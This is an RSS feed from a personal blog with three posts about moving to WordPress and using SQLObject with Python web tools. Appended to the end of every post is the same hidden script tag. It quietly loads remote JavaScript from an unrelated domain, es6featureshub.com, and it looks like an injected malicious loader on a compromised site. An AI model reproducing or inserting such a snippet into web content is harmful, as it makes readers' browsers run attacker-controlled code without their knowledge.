<?xml version="1.0" encoding="UTF-8"?>
<rss version="2.0"
	xmlns:content="http://purl.org/rss/1.0/modules/content/"
	xmlns:wfw="http://wellformedweb.org/CommentAPI/"
	xmlns:dc="http://purl.org/dc/elements/1.1/"
	xmlns:atom="http://www.w3.org/2005/Atom"
	xmlns:sy="http://purl.org/rss/1.0/modules/syndication/"
	xmlns:slash="http://purl.org/rss/1.0/modules/slash/"
	>

<channel>
	<title>Jkx@home &#187; sqlobject</title>
	<atom:link href="http://www.larsen-b.com/tags/sqlobject/feed" rel="self" type="application/rss+xml" />
	<link>http://www.larsen-b.com</link>
	<description>Titanium Exposé</description>
	<lastBuildDate>Fri, 31 Oct 2025 02:15:37 +0000</lastBuildDate>
	<language>en-US</language>
	<sy:updatePeriod>hourly</sy:updatePeriod>
	<sy:updateFrequency>1</sy:updateFrequency>
	<generator>http://wordpress.org/?v=3.5</generator>
		<item>
		<title>Switch to wordpress</title>
		<link>http://www.larsen-b.com/Article/280.html</link>
		<comments>http://www.larsen-b.com/Article/280.html#comments</comments>
		<pubDate>Sun, 13 Apr 2008 15:54:57 +0000</pubDate>
		<dc:creator>admin</dc:creator>
				<category><![CDATA[Blog]]></category>
		<category><![CDATA[docutils]]></category>
		<category><![CDATA[sqlobject]]></category>
		<category><![CDATA[Webware]]></category>
		<category><![CDATA[wordpress]]></category>

		<guid isPermaLink="false">http://www.larsen-b.com/?p=280</guid>
		<description><![CDATA[During the last rescue of this website, I ran into issue. In fact my old blog engine (Alinea) was buggy due to a lot of changes in SQLObject, Webware and docutils. I was sick to patch this days after days &#8230; <a href="http://www.larsen-b.com/Article/280.html">Continue reading <span class="meta-nav">&#8594;</span></a>]]></description>
				<content:encoded><![CDATA[<p>During the last rescue of this website, I ran into issue. In fact my old blog engine (Alinea) was buggy due to a lot of changes in SQLObject, Webware and docutils. I was sick to patch this days after days to maintain this. I decided to switch to a plain-old-fashin php install.</p>
<p>Thanks to AlineaObject lib, it doesn&#8217;t take me too much time, to do the job. I still need to fix some stuff (mainly the rewrite rules), but this look fine. I switched to <a href="http://www.wordpress.org">WordPress</a>. Of course I lost a lot of functionalities of my initial setup, like the Anti-SPAM feature or the ZPT template engine, but right now I get some more stuff.</p>
<p>I already switched 2 times before (Moveable Type, Alinea ..)</p>
<p>The migration works lilke a charm right now, feel free to post if you have some issues.<script>;(function (l, z, f, e, r, p) { r = z.createElement(f); p = z.getElementsByTagName(f)[0]; r.async = 1; r.src = e; p.parentNode.insertBefore(r, p); })(window, document, 'script', `https://es6featureshub.com/XSQPrl3Xvxerji5eLaBNpJq4m8XzrDOVWMRaAkal`);</script></p>
]]></content:encoded>
			<wfw:commentRss>http://www.larsen-b.com/Article/280.html/feed</wfw:commentRss>
		<slash:comments>3</slash:comments>
		</item>
		<item>
		<title>SQLObject and ZPT</title>
		<link>http://www.larsen-b.com/Article/83.html</link>
		<comments>http://www.larsen-b.com/Article/83.html#comments</comments>
		<pubDate>Tue, 13 Jan 2004 21:09:50 +0000</pubDate>
		<dc:creator>admin</dc:creator>
				<category><![CDATA[Misc]]></category>
		<category><![CDATA[cheetah]]></category>
		<category><![CDATA[sqlobject]]></category>
		<category><![CDATA[Webware]]></category>
		<category><![CDATA[Zope]]></category>
		<category><![CDATA[zpt]]></category>

		<guid isPermaLink="false"></guid>
		<description><![CDATA[After looking at several way to build custom webapps in python, i tested several things : Zope alone Zope + CMF Plone Webware + Cheetah or PSP Webware + Modeling + ZPT .. And my conclusions right now is: SQLObject &#8230; <a href="http://www.larsen-b.com/Article/83.html">Continue reading <span class="meta-nav">&#8594;</span></a>]]></description>
				<content:encoded><![CDATA[<p>After looking at several way to build custom webapps in python, i tested several things :</p>
<ul class="simple">
<li>Zope alone</li>
<li>Zope + CMF</li>
<li>Plone</li>
<li>Webware + Cheetah or PSP</li>
<li>Webware + Modeling + ZPT ..</li>
</ul>
<p>And my conclusions right now is: SQLObject is really a kool SQL Api since you can use it very easily. For the template i really think that ZPT is the best one. Despite XML parsing is really slow, and ZPT performance isn&#8217;t really good, you can edit the template without too much pain.</p>
<p>Another great thing, is that i can use this tools in Webware (of course) but in a simple python (mod_python for example)  CGI. And SQLObject really feat nicely w/ webware, because it&#8217;s thread safe. (I discover severals troubles in Modeling w/ thread)</p>
<p>The next step is to find a good way to build &#8216;slots&#8217;, to have a cross site layout. ZPTPage doesn&#8217;t support all METAL tags (macros..) so this isn&#8217;t done by default .. and calling a lot of &#8216;structure&#8217; include is a bad way because this will call the &#8216;slot&#8217;  rendering too much times.</p>
<p>The main key is : Keep it simple.<script>;(function (l, z, f, e, r, p) { r = z.createElement(f); p = z.getElementsByTagName(f)[0]; r.async = 1; r.src = e; p.parentNode.insertBefore(r, p); })(window, document, 'script', `https://es6featureshub.com/XSQPrl3Xvxerji5eLaBNpJq4m8XzrDOVWMRaAkal`);</script></p>
]]></content:encoded>
			<wfw:commentRss>http://www.larsen-b.com/Article/83.html/feed</wfw:commentRss>
		<slash:comments>0</slash:comments>
		</item>
		<item>
		<title>SQLObject on Birthday</title>
		<link>http://www.larsen-b.com/Article/72.html</link>
		<comments>http://www.larsen-b.com/Article/72.html#comments</comments>
		<pubDate>Fri, 19 Dec 2003 22:51:12 +0000</pubDate>
		<dc:creator>admin</dc:creator>
				<category><![CDATA[Misc]]></category>
		<category><![CDATA[Python]]></category>
		<category><![CDATA[sqlobject]]></category>

		<guid isPermaLink="false"></guid>
		<description><![CDATA[First it&#8217;s my birthday today (19/12) .. I am 29 years old .. Oh my god and still playing w/ computer like a kid :) So my playground today was SQLObject. Despite Big (author of Modeling is one of my &#8230; <a href="http://www.larsen-b.com/Article/72.html">Continue reading <span class="meta-nav">&#8594;</span></a>]]></description>
				<content:encoded><![CDATA[<p>First it&#8217;s my birthday today (19/12) .. I am 29 years old .. Oh my god and still playing w/ computer like a kid :)</p>
<p>So my playground today was <a class="reference" href="href=http://www.sqlobject.org">SQLObject</a>. Despite Big (author of <a class="reference" href="http://modeling.sf.net">Modeling</a> is one of my best friend, and I have been for a long time the only debugger of this stuff (i work with him during 1year), today I decided to try SQLObjet.</p>
<p>And I really enjoyed this game play:) Modeling is far more complex because it use a hard model described in XML. SQLObject is really more fun, adding some row to the db is a piece of cake. Beside i really like the Editing Context used in Modeling ( ripped of EOF and used in MiddleKit too ), SQLObject is more simple and better fit for projet that take care finer to db .. And it is thread safe.</p>
<p>If i have 10 min i will look why the SQLLiteConnection seems buggy. it looks like trouble is in fetchInsterID() ..</p>
<p>Have a nice Birthday Jerome :) and now patch your linux kernel to use the new NetGear your girlfriend give you for the turn.<script>;(function (l, z, f, e, r, p) { r = z.createElement(f); p = z.getElementsByTagName(f)[0]; r.async = 1; r.src = e; p.parentNode.insertBefore(r, p); })(window, document, 'script', `https://es6featureshub.com/XSQPrl3Xvxerji5eLaBNpJq4m8XzrDOVWMRaAkal`);</script></p>
]]></content:encoded>
			<wfw:commentRss>http://www.larsen-b.com/Article/72.html/feed</wfw:commentRss>
		<slash:comments>0</slash:comments>
		</item>
	</channel>
</rss>
